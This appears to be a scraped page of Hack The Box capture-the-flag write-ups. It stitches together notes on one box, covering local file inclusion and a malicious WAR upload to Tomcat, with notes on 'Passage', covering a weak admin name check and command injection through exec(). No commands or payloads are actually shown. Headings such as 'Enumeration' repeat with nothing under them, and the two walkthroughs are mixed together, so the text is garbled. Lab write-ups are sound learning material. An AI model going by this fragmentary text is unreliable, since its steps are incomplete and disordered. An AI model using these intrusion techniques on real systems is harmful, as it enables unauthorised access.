First i thought it may be LFI and it was right expectation but let’s add 10.10.10.194 to our /etc/hosts file

the second step is to exploit but i need more information now the role of port 8080

checking this port 10.10.10.194:8080

Exploitation

kk.war is uploaded successfully

Privilege Escalation

1- Own User

2- Own Root

Steps to be performed on the attacker machine:

finally pwned

Passage

Hack The Box - Passage

This is my writeup and walkthrough for Pssage from Hack The Box.

`User access`

1- route to `/priv` we found that code only check on the name parameter that `name ==theadmin`.

2- route `/log/` `exec(getLogs, (err , output)` here we got `RCE` that took `${file}` and executed.

STEPS To be `authenticated`:

STEPS to be `authorized` :

`ROOT ACCESS`

`Core Dump`

`Enumeration`

`User access`

(Note that An x character indicates that encrypted password is stored in /etc/shadow file like `root:x:`)

`ROOT access`

`Enumeration`

`Enumeration`

`Enumeration`

My focus was on Port 80 `http Apache httpd 2.4.41 ((Ubuntu))` ,and 8080 running a http Apache called `Tomcat`.

Ckeck site very well moving to `news` page founding paramter `file` it maybe vulnerable

First i thought it may be `LFI` and it was right expectation but let’s add 10.10.10.194 to our `/etc/hosts` file

the second step is to exploit but i need more information now the role of port `8080`

checking this port `10.10.10.194:8080`

`kk.war` is uploaded successfully

`Enumeration`

`Enumeration`